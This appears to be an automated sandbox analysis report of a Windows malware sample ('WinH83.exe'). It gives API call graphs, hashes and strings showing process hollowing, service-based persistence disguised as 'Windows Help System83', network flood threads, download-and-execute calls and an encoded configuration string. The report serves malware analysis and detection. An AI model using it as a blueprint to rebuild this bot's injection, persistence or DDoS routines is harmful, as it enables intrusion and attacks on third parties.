      • String ID: Kernel32.dll$VirtualAllocEx
      • API String ID: 1646373207-2312931118
      • Opcode ID: bc67872528889f18fc269d71765628177d41be209ebb95b5a36184931c2f64ff
      • Instruction ID: 1f5087a167780450935ce27456e9c382f66f6d31a4a0d8f7e720613a16c3e223
      • Opcode Fuzzy Hash: bc67872528889f18fc269d71765628177d41be209ebb95b5a36184931c2f64ff
      • Instruction Fuzzy Hash: 90C08CB12802205FC6507BA4BE0DA963E58EA04B11312083AF0C6F2290C9B40850879A
      APIs
      Strings
      • O5WGU2RYGMXDGMZSGIXG64THHI4DG===, xrefs: 00402FDB
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: setsockopt
      • String ID: O5WGU2RYGMXDGMZSGIXG64THHI4DG===
      • API String ID: 3981526788-1710454822
      • Opcode ID: f02676a5f20a0448794ca7539439c6700ce440e1f56ecd6caa4025d4a2f7fda6
      • Instruction ID: dab42955ede70b45eea24b3139e0784c7e83a395bc8883f859031c1f01a4b626
      • Opcode Fuzzy Hash: f02676a5f20a0448794ca7539439c6700ce440e1f56ecd6caa4025d4a2f7fda6
      • Instruction Fuzzy Hash: CB118F725083019FE310DF1DCC41A9BBBE8FFC8714F44496EF595A6291E3B0D6088E92
      APIs
      • GetProcAddress.KERNEL32(?,DnsFlushResolverCache), ref: 00401018
      • FreeLibrary.KERNEL32(?,?,DnsFlushResolverCache), ref: 00401025
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressFreeLibraryProc
      • String ID: DnsFlushResolverCache
      • API String ID: 3013587201-2186135719
      • Opcode ID: 74f0ee3f8432daaa9068a4e807a241aa99ee2c4d0fd81151e60a8f6ca162a658
      • Instruction ID: 1f75d3966693e7a36abaddef8804c89aec62f9cfac8ca5470afc03c7ea179309
      • Opcode Fuzzy Hash: 74f0ee3f8432daaa9068a4e807a241aa99ee2c4d0fd81151e60a8f6ca162a658
      • Instruction Fuzzy Hash: 75D0A931A828628AC62267602C083EF2290AD0170130A0032ED93F12A1CB3C9C9240AD

      Execution Graph

      Execution Coverage

      Dynamic/Packed Code Coverage

      Signature Coverage

      Execution Coverage:8.7%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:0%
      Total number of Nodes:541
      Total number of Limit Nodes:6
      Show Legend
      Hide Nodes/Edges
      execution_graph 1404 401860 GetModuleHandleA GetProcAddress 1405 40189a 1404->1405 1406 4018a5 GlobalAlloc 1405->1406 1407 401a0b printf 1405->1407 1408 4018c1 1406->1408 1408->1407 1409 4018c9 LoadLibraryExA 1408->1409 1410 4018f2 GetLastError printf 1409->1410 1411 40190f GlobalFree GetProcAddress 1409->1411 1412 401940 1411->1412 1413 40192a printf 1411->1413 1422 401720 1412->1422 1415 401949 1416 401952 printf 1415->1416 1417 401968 printf 1415->1417 1418 40198e 1417->1418 1419 4019ed printf FreeLibrary 1418->1419 1429 401680 1418->1429 1426 401748 1422->1426 1423 401839 printf 1424 401847 1423->1424 1424->1415 1425 401833 1425->1423 1425->1424 1426->1423 1426->1425 1427 4017dc printf 1426->1427 1428 40181e 1426->1428 1427->1426 1428->1415 1430 401688 DeviceIoControl 1429->1430 1431 4016b7 printf 1429->1431 1430->1431 1432 4016ad GetLastError 1430->1432 1431->1418 1431->1419 1432->1431 1433 401b60 CreateFileA 1434 401b85 GetFileSize 1433->1434 1435 401bcb CloseHandle 1433->1435 1434->1435 1436 401b98 ??2@YAPAXI ReadFile CloseHandle 1434->1436 1437 401f60 RegisterServiceCtrlHandlerA SetServiceStatus 1438 401ff3 1437->1438 1460 401000 LoadLibraryA 1438->1460 1441 40202e 1465 405440 1441->1465 1442 402009 1442->1441 1444 402011 1442->1444 1443 40201d 1445 4054b0 3 API calls 1443->1445 1447 4053c0 3 API calls 1444->1447 1448 40201b 1445->1448 1447->1448 1449 40203d GetModuleFileNameA 1448->1449 1468 404c10 GetModuleHandleA GetProcAddress 1449->1468 1451 40205d 1469 405270 CreateFileA 1451->1469 1453 402083 1454 402093 1453->1454 1455 40208c ExitProcess 1453->1455 1477 401030 GetSystemDirectoryA 1454->1477 1457 402098 GetCurrentProcess SetPriorityClass 1480 402310 CreateMutexA GetLastError 1457->1480 1459 4020af 1461 401012 GetProcAddress 1460->1461 1462 40102b 1460->1462 1463 401022 1461->1463 1464 401024 FreeLibrary 1461->1464 1462->1441 1462->1442 1462->1443 1463->1464 1464->1462 1466 405452 1465->1466 1467 40545c GetSystemDirectoryA lstrcat lstrcpy 1465->1467 1466->1449 1467->1449 1468->1451 1470 4052a4 1469->1470 1471 40531f 1469->1471 1470->1471 1472 4052a8 GetFileSize ??2@YAPAXI ReadFile 1470->1472 1471->1453 1473 405303 CloseHandle ??3@YAXPAX 1472->1473 1474 4052ec 1472->1474 1473->1453 1484 405330 1474->1484 1476 405301 1476->1473 1478 401079 1477->1478 1478->1478 1479 40108e GetPEB GetPEB GetPEB 1478->1479 1479->1457 1481 402338 CloseHandle 1480->1481 1482 40234a WSAStartup 1480->1482 1481->1459 1483 40236c CreateThread WaitForSingleObject CloseHandle Sleep 1482->1483 1483->1483 1519 4023a0 1483->1519 1490 404d20 1484->1490 1486 40535f 1487 4053a9 1486->1487 1499 405050 1486->1499 1487->1476 1489 405388 VirtualFree 1489->1476 1491 404eb3 1490->1491 1492 404d35 1490->1492 1491->1486 1492->1491 1493 404d9a VirtualAlloc 1492->1493 1494 404ea6 1493->1494 1496 404db9 memmove 1493->1496 1494->1486 1498 404e13 1496->1498 1497 404e42 memmove 1497->1498 1498->1494 1498->1497 1511 404f50 CreateProcessA 1499->1511 1501 405091 1502 40525c 1501->1502 1503 4050e4 1501->1503 1505 4050ca VirtualProtectEx 1501->1505 1502->1489 1504 40521b TerminateProcess CloseHandle CloseHandle CloseHandle 1503->1504 1514 404f00 LoadLibraryA 1503->1514 1504->1489 1507 4050fa 1505->1507 1507->1504 1508 40516c WriteProcessMemory WriteProcessMemory 1507->1508 1508->1504 1509 4051aa SetThreadContext ResumeThread CloseHandle CloseHandle 1508->1509 1509->1489 1512 404fa5 GetThreadContext ReadProcessMemory VirtualQueryEx 1511->1512 1513 405039 1511->1513 1512->1501 1513->1501 1515 404f15 GetProcAddress 1514->1515 1516 404f3f 1514->1516 1517 404f25 1515->1517 1518 404f38 FreeLibrary 1515->1518 1516->1507 1517->1518 1518->1516 1520 4025c5 socket 1519->1520 1521 4023b8 lstrlen 1519->1521 1593 4030e0 inet_addr 1520->1593 1522 4023e6 1521->1522 1587 402c80 wvsprintfA OutputDebugStringA 1522->1587 1525 402c71 1527 4023f3 strstr 1528 402420 1527->1528 1529 4024a2 1527->1529 1530 402517 strstr 1528->1530 1588 401440 LoadLibraryA 1529->1588 1536 402541 strstr 1530->1536 1537 40252e 1530->1537 1532 40262b 1533 402c6a closesocket 1532->1533 1596 402fd0 1532->1596 1533->1525 1534 4024af _strlwr lstrcpy strstr 1534->1530 1538 4024dc 1534->1538 1536->1520 1540 402550 strcspn strncpy strcspn strstr 1536->1540 1537->1536 1541 4024e2 Sleep 1538->1541 1539 40265e 1601 402cb0 RegOpenKeyExA 1539->1601 1540->1520 1543 402596 strcspn strncpy atoi 1540->1543 1544 401440 6 API calls 1541->1544 1543->1520 1546 4024f6 _strlwr lstrcpy strstr 1544->1546 1545 40266b 1547 402682 send 1545->1547 1546->1530 1546->1541 1547->1533 1577 4026a4 1547->1577 1548 402c54 InterlockedExchange shutdown 1548->1533 1549 4026b3 select 1549->1548 1549->1577 1550 4026fb __WSAFDIsSet 1550->1549 1551 40270d recv 1550->1551 1551->1548 1551->1577 1552 402744 InterlockedExchange 1552->1577 1553 40276a CreateThread 1553->1553 1553->1577 1761 403110 WSASocketA 1553->1761 1554 402b8a InterlockedExchange 1554->1549 1555 402b9c OpenMutexA 1556 402bc1 GetSystemDirectoryA lstrcat lstrcat DeleteFileA 1555->1556 1557 402bb3 ReleaseMutex CloseHandle 1555->1557 1627 4022c0 OpenSCManagerA 1556->1627 1557->1556 1558 402a27 CreateThread 1558->1577 1783 4046c0 htons 1558->1783 1559 402791 CreateThread 1559->1559 1559->1577 1791 403110 28 API calls 1559->1791 1560 4027b2 CreateThread 1560->1577 1792 403110 28 API calls 1560->1792 1561 401390 6 API calls 1567 402b1e ExitWindowsEx 1561->1567 1563 402a93 shutdown closesocket 1563->1549 1567->1549 1569 402a73 send 1569->1549 1570 4027d4 CreateThread 1570->1570 1570->1577 1634 403440 WSAStartup WSASocketA 1570->1634 1571 402af5 ExitWindowsEx 1571->1549 1572 4027fb CreateThread 1572->1572 1572->1577 1648 403440 13 API calls 1572->1648 1573 402822 CreateThread 1573->1573 1573->1577 1649 403a30 htons 1573->1649 1574 402849 CreateThread 1574->1574 1574->1577 1660 4035d0 1574->1660 1575 402870 CreateThread 1575->1575 1575->1577 1674 403710 htons 1575->1674 1576 402897 CreateThread 1576->1576 1576->1577 1686 403850 socket htons 1576->1686 1577->1548 1577->1549 1577->1550 1577->1552 1577->1553 1577->1554 1577->1555 1577->1558 1577->1559 1577->1560 1577->1561 1577->1563 1577->1569 1577->1570 1577->1572 1577->1573 1577->1574 1577->1575 1577->1576 1578 4028d4 CreateThread 1577->1578 1579 4028be CreateThread 1577->1579 1580 4028f0 CreateThread CreateThread 1577->1580 1581 40291e CreateThread 1577->1581 1582 402945 CreateThread 1577->1582 1583 40296c CreateThread 1577->1583 1584 402993 CreateThread 1577->1584 1585 4029b4 CreateThread 1577->1585 1586 4029ce recv 1577->1586 1612 401390 GetCurrentProcess OpenProcessToken 1577->1612 1619 401640 LoadLibraryA GetProcAddress 1577->1619 1621 401510 LoadLibraryA LoadLibraryA GetProcAddress GetProcAddress 1577->1621 1578->1577 1694 403cc0 htons 1578->1694 1579->1578 1579->1579 1700 403ba0 htons 1579->1700 1580->1577 1711 403cc0 8 API calls 1580->1711 1712 403d70 htons 1580->1712 1581->1577 1581->1581 1720 403cc0 8 API calls 1581->1720 1582->1577 1582->1582 1721 403e20 strstr 1582->1721 1583->1577 1583->1583 1736 404340 htons 1583->1736 1584->1577 1584->1584 1746 404090 strstr 1584->1746 1585->1577 1775 404490 1585->1775 1586->1577 1587->1527 1589 401503 1588->1589 1590 40145c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 1588->1590 1589->1534 1592 4014a0 FreeLibrary 1590->1592 1592->1534 1594 4030f0 gethostbyname 1593->1594 1595 4025fa htons connect 1593->1595 1594->1595 1595->1525 1595->1532 1597 402fe9 setsockopt 1596->1597 1598 402fde 1596->1598 1599 403016 WSAIoctl 1597->1599 1600 40300e 1597->1600 1598->1539 1599->1539 1600->1539 1602 402d14 RegQueryValueExA RegCloseKey 1601->1602 1603 402d95 GetVersionExA 1601->1603 1602->1603 1607 402d72 1602->1607 1605 402dfc 1603->1605 1610 402e09 wsprintfA GlobalMemoryStatusEx 1603->1610 1605->1545 1606 402d78 _strnicmp 1606->1603 1606->1607 1607->1603 1607->1606 1632 4056b0 1610->1632 1613 4013b3 1612->1613 1614 4013b7 LookupPrivilegeValueA 1612->1614 1613->1571 1615 4013cd CloseHandle 1614->1615 1616 4013de AdjustTokenPrivileges 1614->1616 1615->1571 1617 401421 CloseHandle 1616->1617 1618 401432 1616->1618 1617->1571 1618->1571 1620 40166e FreeLibrary 1619->1620 1620->1577 1622 401567 1621->1622 1623 401581 ??2@YAPAXI 1622->1623 1624 40161c FreeLibrary FreeLibrary 1622->1624 1625 40159b 1623->1625 1624->1577 1625->1624 1626 40159f strncpy CreateProcessA 1625->1626 1626->1624 1628 402304 wsprintfA SHDeleteKeyA closesocket ExitProcess 1627->1628 1629 4022d6 OpenServiceA 1627->1629 1630 4022f5 DeleteService CloseServiceHandle 1629->1630 1631 4022ff CloseServiceHandle 1629->1631 1630->1631 1631->1628 1633 402f28 _ui64toa GetSystemDefaultUILanguage 1632->1633 1633->1545 1635 403488 setsockopt 1634->1635 1636 40347a 1634->1636 1637 4034b5 setsockopt 1635->1637 1638 4034a7 1635->1638 1639 4030e0 2 API calls 1637->1639 1640 4034f1 1639->1640 1793 4011a0 1640->1793 1642 403500 GetCurrentProcessId 1643 4035b4 1642->1643 1646 403544 1642->1646 1644 403550 GetTickCount 1644->1646 1645 403568 sendto 1645->1646 1646->1643 1646->1644 1646->1645 1647 40359e Sleep 1646->1647 1647->1646 1650 4030e0 2 API calls 1649->1650 1654 403a70 1650->1654 1651 403b81 1652 403a84 socket connect 1653 403b7a closesocket 1652->1653 1652->1654 1653->1651 1654->1651 1654->1652 1655 4011a0 GetTickCount srand rand 1654->1655 1656 403af2 sprintf send 1654->1656 1655->1654 1657 403b54 closesocket 1656->1657 1658 403b3a Sleep 1656->1658 1657->1652 1659 403b68 1657->1659 1658->1654 1658->1657 1796 4056d0 1660->1796 1663 4030e0 2 API calls 1664 403610 1663->1664 1665 4036fd 1664->1665 1666 40362e socket setsockopt 1664->1666 1667 4011a0 3 API calls 1666->1667 1670 403664 1667->1670 1668 4011a0 3 API calls 1668->1670 1669 403691 sendto 1669->1670 1671 4036b5 Sleep 1669->1671 1670->1668 1670->1669 1672 4036cb closesocket Sleep 1670->1672 1671->1670 1672->1666 1673 4036eb 1672->1673 1675 4030e0 2 API calls 1674->1675 1676 40374c 1675->1676 1677 40383d 1676->1677 1678 40376a socket connect setsockopt 1676->1678 1679 4011a0 3 API calls 1678->1679 1681 4037ae 1679->1681 1680 4011a0 3 API calls 1680->1681 1681->1680 1682 4037d8 send 1681->1682 1684 40380b closesocket Sleep 1681->1684 1682->1681 1683 4037f5 Sleep 1682->1683 1683->1681 1684->1678 1685 40382b 1684->1685 1687 4030e0 2 API calls 1686->1687 1688 40389b htons htons htons htons htons 1687->1688 1689 403a1c 1688->1689 1691 403906 1688->1691 1690 4011a0 GetTickCount srand rand 1690->1691 1691->1690 1692 403957 sendto Sleep 1691->1692 1692->1691 1693 403a0a 1692->1693 1695 4030e0 2 API calls 1694->1695 1697 403cf9 1695->1697 1696 403d61 1697->1696 1698 403d1f socket connect Sleep closesocket Sleep 1697->1698 1698->1698 1699 403d52 1698->1699 1701 4030e0 2 API calls 1700->1701 1706 403bdc 1701->1706 1702 403c9c 1703 403c00 socket connect 1704 403c21 closesocket 1703->1704 1703->1706 1704->1706 1705 4011a0 3 API calls 1705->1706 1706->1702 1706->1703 1706->1705 1707 4011a0 3 API calls 1706->1707 1708 403c60 send 1707->1708 1709 403c71 Sleep 1708->1709 1710 403c7f closesocket Sleep 1708->1710 1709->1706 1709->1710 1710->1706 1713 4030e0 2 API calls 1712->1713 1714 403db0 1713->1714 1715 403dd5 socket connect Sleep 1714->1715 1715->1715 1716 403dfb 1715->1716 1717 403e11 1716->1717 1718 403e04 Sleep 1716->1718 1719 403e1b closesocket 1717->1719 1718->1717 1718->1718 1719->1719 1722 403e72 1721->1722 1723 403e88 strstr 1721->1723 1722->1723 1724 403e97 strcspn strncpy strcspn 1723->1724 1725 403efa htons 1723->1725 1724->1725 1727 4030e0 2 API calls 1725->1727 1728 403f67 wsprintfA 1727->1728 1729 403fd3 1728->1729 1730 40407e 1728->1730 1731 403fda socket connect 1729->1731 1734 40406f 1729->1734 1731->1729 1732 403ffb setsockopt setsockopt 1731->1732 1733 404028 send Sleep 1732->1733 1733->1733 1735 404052 closesocket Sleep 1733->1735 1735->1729 1737 4030e0 2 API calls 1736->1737 1738 40437d wsprintfA 1737->1738 1739 4043d6 1738->1739 1740 40447c 1738->1740 1741 4043df socket connect 1739->1741 1744 40446d 1739->1744 1741->1739 1742 404400 setsockopt setsockopt 1741->1742 1743 40442d send Sleep 1742->1743 1743->1743 1745 404451 closesocket Sleep 1743->1745 1745->1739 1747 4040e2 1746->1747 1748 4040f8 strstr 1746->1748 1747->1748 1749 404107 strcspn strncpy strcspn 1748->1749 1750 40416a htons 1748->1750 1749->1750 1752 4030e0 2 API calls 1750->1752 1753 4041d7 1752->1753 1754 40432d 1753->1754 1755 404218 wsprintfA 1753->1755 1756 40424b wsprintfA socket connect 1753->1756 1759 40431e 1753->1759 1755->1753 1755->1756 1756->1753 1757 404296 setsockopt setsockopt 1756->1757 1758 4042d3 send Sleep 1757->1758 1758->1758 1760 4042fd closesocket Sleep 1758->1760 1760->1753 1762 403164 setsockopt 1761->1762 1763 403156 1761->1763 1764 403181 1762->1764 1765 40318f setsockopt 1762->1765 1766 4031b0 1765->1766 1767 4031be htons 1765->1767 1768 4030e0 2 API calls 1767->1768 1772 4031e4 1768->1772 1769 403428 1770 403250 17 API calls 1771 403323 htons htons 1770->1771 1770->1772 1771->1772 1772->1769 1772->1770 1772->1771 1773 4033ea sendto Sleep 1772->1773 1773->1773 1774 403413 Sleep 1773->1774 1774->1769 1774->1770 1776 4056d0 1775->1776 1777 40449a LoadLibraryA 1776->1777 1778 4045c0 FreeLibrary 1777->1778 1779 4044be GetProcAddress GetProcAddress GetProcAddress GetProcAddress 1777->1779 1779->1778 1782 4044ff Sleep 1779->1782 1781 4045bf 1781->1778 1782->1781 1784 4030e0 2 API calls 1783->1784 1785 4046f9 1784->1785 1786 40476f 1785->1786 1787 404719 socket 1785->1787 1788 40472c sendto Sleep 1787->1788 1788->1788 1789 40474f closesocket Sleep 1788->1789 1789->1787 1790 404763 1789->1790 1794 4011b3 GetTickCount srand rand 1793->1794 1795 4011ae 1793->1795 1794->1642 1795->1642 1797 4035da htons 1796->1797 1797->1663 1798 4020e0 1799 402145 SetServiceStatus 1798->1799 1800 4020ee 1798->1800 1803 40215d SetServiceStatus 1799->1803 1801 4020f1 1800->1801 1802 40211c SetServiceStatus SetServiceStatus 1800->1802 1801->1803 1804 4020f4 SetServiceStatus SetServiceStatus 1801->1804 1805 4045e0 htons 1806 4030e0 2 API calls 1805->1806 1810 40461d 1806->1810 1807 404694 1808 404639 socket connect 1809 4046a0 closesocket 1808->1809 1808->1810 1810->1807 1810->1808 1811 40465c send 1810->1811 1812 404680 closesocket Sleep 1811->1812 1813 404671 Sleep 1811->1813 1812->1807 1812->1808 1813->1811 1813->1812 1814 4073e0 1816 40745e 1814->1816 1815 4075b8 1816->1815 1817 40b000 2 API calls 1816->1817 1818 40b0c1 1817->1818 1381 401cc5 1382 401cc7 1381->1382 1382->1382 1385 401b10 CreateFileA 1382->1385 1384 401ce4 ??3@YAXPAX 1386 401b34 WriteFile CloseHandle 1385->1386 1387 401b5a 1385->1387 1386->1384 1387->1384 1388 401c07 Sleep VirtualAlloc 1389 401c30 1388->1389 1390 401c6b 1388->1390 1392 401c3c 1389->1392 1393 401c48 VirtualFree 1392->1393 1395 401c6b 1393->1395 1395->1390 1244 406549 1245 4065d5 1244->1245 1248 406567 1244->1248 1246 4065df GetProcAddress LoadLibraryA 1245->1246 1247 4065f2 1246->1247 1249 406640 GetProcAddress Sleep 1247->1249 1250 406600 GetProcAddress GetProcAddress 1247->1250 1248->1246 1248->1247 1251 406624 GetProcAddress 1248->1251 1255 4065be LoadLibraryA 1248->1255 1252 406666 InternetOpenA InternetOpenUrlA InternetReadFile InternetCloseHandle InternetCloseHandle 1249->1252 1250->1251 1251->1249 1253 406701 1252->1253 1254 40677b URLDownloadToFileA Sleep ShellExecuteA Sleep 1252->1254 1253->1252 1254->1254 1255->1245 1819 40d06a DeleteFileA 1820 40d099 GetPEB 1819->1820 1821 40d03f GetProcAddress 1819->1821 1823 40d0b1 1820->1823 1822 40d034 1821->1822 1822->1821 1824 40d01f LoadLibraryA 1822->1824 1825 40d07e DeleteFileA 1822->1825 1824->1822 1825->1820 1825->1821 1826 401a30 OpenSCManagerA 1827 401aa3 1826->1827 1828 401a47 OpenServiceA StartServiceA 1826->1828 1829 401a74 CreateFileA CloseServiceHandle CloseServiceHandle 1828->1829 1830 401a66 puts 1828->1830 1830->1829 1831 401ab0 CloseHandle OpenSCManagerA 1832 401ad1 OpenServiceA 1831->1832 1833 401b06 1831->1833 1834 401af0 ControlService CloseServiceHandle 1832->1834 1835 401b01 CloseServiceHandle 1832->1835 1834->1835 1835->1833 1396 405851 _exit 1836 407173 1837 407182 1836->1837 1838 40b000 2 API calls 1837->1838 1839 40b0c1 1838->1839 1840 406934 1843 4010f0 LoadLibraryA 1840->1843 1842 406941 1842->1842 1844 401112 Sleep GetProcAddress 1843->1844 1845 40110c 1843->1845 1846 401135 lstrcpy GetStartupInfoA Sleep 1844->1846 1847 40112f 1844->1847 1845->1842 1848 401185 FreeLibrary 1846->1848 1847->1842 1848->1842 1849 40b235 1851 40b1a0 1849->1851 1852 40b092 1849->1852 1855 40720c LoadLibraryA GetProcAddress 1852->1855 1854 40b09b 1855->1854 1397 40d016 1398 40d01f LoadLibraryA 1397->1398 1399 40d034 1398->1399 1399->1398 1400 40d03f GetProcAddress 1399->1400 1401 40d07e DeleteFileA 1399->1401 1400->1399 1401->1400 1402 40d099 GetPEB 1401->1402 1403 40d0b1 1402->1403 1256 40d07e DeleteFileA 1257 40d099 GetPEB 1256->1257 1258 40d03f GetProcAddress 1256->1258 1260 40d0b1 1257->1260 1259 40d034 1258->1259 1259->1256 1261 40d03a 1259->1261 1262 40d01f LoadLibraryA 1259->1262 1261->1258 1262->1259 1263 4056ff __set_app_type __p__fmode __p__commode 1264 40576e 1263->1264 1265 405782 1264->1265 1266 405776 __setusermatherr 1264->1266 1275 40586a _controlfp 1265->1275 1266->1265 1268 405787 _initterm __getmainargs _initterm 1269 4057db GetStartupInfoA 1268->1269 1271 40580f GetModuleHandleA 1269->1271 1276 401d00 SetErrorMode 1271->1276 1274 405833 exit _XcptFilter 1275->1268 1277 401d59 1276->1277 1314 4047e0 1277->1314 1279 401d6f GetModuleHandleA FreeLibrary 1280 401d8e 1279->1280 1285 401da6 1279->1285 1281 401d91 1280->1281 1282 401da8 1280->1282 1281->1285 1323 4053c0 1281->1323 1326 4054b0 1282->1326 1286 401ddb 1285->1286 1287 401e0f 1285->1287 1289 401dfe 1286->1289 1290 401dde 1286->1290 1335 405600 1287->1335 1291 405590 3 API calls 1289->1291 1293 401df2 1290->1293 1294 401de6 1290->1294 1296 401df0 1291->1296 1292 401e1e lstrcat GetModuleFileNameA lstrcmpi 1297 401e63 GetCurrentProcess SetPriorityClass 1292->1297 1298 401e89 lstrcmpi 1292->1298 1332 405520 1293->1332 1329 405590 1294->1329 1296->1292 1338 401be1 1297->1338 1301 401f03 StartServiceCtrlDispatcherA 1298->1301 1302 401e9c 1298->1302 1303 401f32 1301->1303 1304 401f4e 1301->1304 1306 401eaa CopyFileA 1302->1306 1340 402170 OpenSCManagerA 1303->1340 1304->1274 1307 401ec3 SetFileAttributesA 1306->1307 1308 401ef6 1306->1308 1313 40690a 1307->1313 1317 4011e0 GetEnvironmentVariableA 1308->1317 1312 401efb ExitProcess 1313->1274 1350 404820 1314->1350 1316 4047fa 1316->1279 1318 401378 1317->1318 1319 401208 GetModuleFileNameA 1317->1319 1318->1312 1319->1318 1320 401222 GetShortPathNameA 1319->1320 1320->1318 1321 40123f 8 API calls 1320->1321 1321->1318 1322 40134d SetPriorityClass SetThreadPriority ResumeThread 1321->1322 1322->1312 1324 4053d2 1323->1324 1325 4053dc GetSystemDirectoryA lstrcat lstrcpy 1323->1325 1324->1285 1325->1285 1327 4054c2 1326->1327 1328 4054cc GetSystemDirectoryA lstrcat lstrcpy 1326->1328 1327->1285 1328->1285 1330 4055a2 1329->1330 1331 4055ac GetSystemDirectoryA lstrcat lstrcpy 1329->1331 1330->1296 1331->1296 1333 405532 1332->1333 1334 40553c GetWindowsDirectoryA lstrcat lstrcpy 1332->1334 1333->1296 1334->1296 1336 405612 1335->1336 1337 40561c GetSystemDirectoryA lstrcat lstrcpy 1335->1337 1336->1292 1337->1292 1373 401bed CreateThread 1338->1373 1341 402271 1340->1341 1342 4021be CreateServiceA 1340->1342 1374 402294 1341->1374 1343 402217 StartServiceA 1342->1343 1344 4021e9 GetLastError 1342->1344 1343->1341 1347 402226 wsprintfA RegOpenKeyA lstrlen RegSetValueExA 1343->1347 1344->1343 1346 4021f6 OpenServiceA 1344->1346 1346->1341 1349 40220c StartServiceA 1346->1349 1347->1341 1349->1343 1351 404831 1350->1351 1354 4071e2 GetPEB 1351->1354 1356 407182 1354->1356 1357 4048bd 1356->1357 1359 40b000 1356->1359 1357->1316 1360 40b0aa 1359->1360 1361 40b0b7 1360->1361 1365 40b0e3 1360->1365 1363 40b000 2 API calls 1361->1363 1364 40b0c1 1363->1364 1366 40b107 1365->1366 1368 40b114 1366->1368 1369 40b269 1366->1369 1368->1361 1372 40720c LoadLibraryA GetProcAddress 1369->1372 1371 40b273 1372->1371 1375 4022a2 1374->1375 1376 40229b RegCloseKey 1374->1376 1377 4022a6 CloseServiceHandle 1375->1377 1378 4022ad 1375->1378 1376->1375 1377->1378 1379 4022b1 CloseServiceHandle 1378->1379 1380 401f4b 1378->1380 1379->1380 1380->1304

      Executed Functions

      Control-flow Graph

      APIs
      • SetErrorMode.KERNELBASE(00000001), ref: 00401D08
      • GetModuleHandleA.KERNEL32(kmon.dll,?,?,?,?,?,000001BC,000007C2), ref: 00401D77
      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,000001BC,000007C2), ref: 00401D7E
      • lstrcat.KERNEL32(?,WinH83.exe), ref: 00401E2C
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E41
      • lstrcmpi.KERNEL32(?,?), ref: 00401E5D
      • GetCurrentProcess.KERNEL32(00004000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E68
      • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E6F
      • lstrcmpi.KERNEL32(?,?), ref: 00401E96
      • CopyFileA.KERNEL32(?,?,00000000), ref: 00401EB9
      • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401ECA
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: File$Modulelstrcmpi$AttributesClassCopyCurrentErrorFreeHandleLibraryModeNamePriorityProcesslstrcat
      • String ID: 8$A$B$C$D$E$F$G$H$I$J$K$Mu$O5WGU2RYGMXDGMZSGIXG64THHI4DG===$WinH83$WinH83.exe$Windows Help System83$Windows83$kmon.dll
      • API String ID: 139532127-2983036780
      • Opcode ID: 0078be2832fa0faa2a8baf98b57dde6bfc22fe376f97e329316eab35eed276fc
      • Instruction ID: 5410645d6abaed84b275c9712b1141a2809baf3a13989eb83d3553c9209378c8
      • Opcode Fuzzy Hash: 0078be2832fa0faa2a8baf98b57dde6bfc22fe376f97e329316eab35eed276fc
      • Instruction Fuzzy Hash: A281F8B0148342ABD310EB60DD45BDB7BD8EF84718F40492EF689661D1EBBCD51887AB

      Control-flow Graph

      APIs
      • LoadLibraryA.KERNELBASE(urlmon.dll,00707474), ref: 004065C9
      • GetProcAddress.KERNEL32 ref: 004065DF
      • LoadLibraryA.KERNELBASE(wininet.dll), ref: 004065F1
      • GetProcAddress.KERNEL32(6F3E0000,InternetOpenA), ref: 00406607
      • GetProcAddress.KERNEL32(6F3E0000,InternetOpenUrlA), ref: 0040661F
      • GetProcAddress.KERNEL32(6F3E0000,InternetReadFile), ref: 00406637
